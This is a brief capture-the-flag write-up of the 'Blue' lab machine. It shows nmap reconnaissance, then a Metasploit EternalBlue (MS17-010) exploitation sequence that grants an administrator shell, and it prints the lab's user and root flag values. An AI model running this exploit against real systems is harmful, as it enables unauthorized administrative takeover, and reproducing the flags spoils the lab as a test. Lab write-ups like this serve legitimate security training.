Blue

TARGET IP: 10.10.10.40

nmap [Target IP]

nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 [Target IP]

Looks like we have SMB open and some RPC open on other ports as well.
Based on the name alone, I'm highly suspicious that this thing is susceptible to eternal blue. I'm going to use an Nmap scan I found in a previous lab to check.

nmap -p 445 --script smb-protocols {TARGET IP]

Based on the fact that it allows for SMBv1 and it is running Windows 7, I'm fairly confident that we could probably get Eternal Blue to run.

msfconsole
search smb
use windows/smb/ms17_010_eternalblue
show options

set rhosts [Target IP]
set lhost [Host IP]

check

exploit

shell
whoami

And now I have administrator privileges on the machine. Wow that was easy. Let's go grab the flags.

type C:\Users\haris\Desktop\user.txt

9ba10e548f8c18db7f90a5d1c5e2abc4

type C:\Users\Administrator\Desktop\root.txt

77a3bb72c76512c79b243e5235c38958

This was really easy and I had a feeling it was going to be really easy. Since I first saw the name of this machine and that it was a Windows machine, I already guessed it was going to be an eternal blue exploit.
I skipped a LOT of steps in the process that I normally would not have but since I already had a pretty good idea of where to go, I figured I would give that a try. Worst case scenario it doesn't work and I go back to my usual process of Recon and Enumeration to discover other methods.
Having done a coupe of other labs with Eternal Blue, I already knew how to exploit this machine so it was pretty quick. It's also scary to think how easy this tool is to use to immediately gain admin power in a system. Good job on creating an awesome tool NSA agents.

Last updated 2 years ago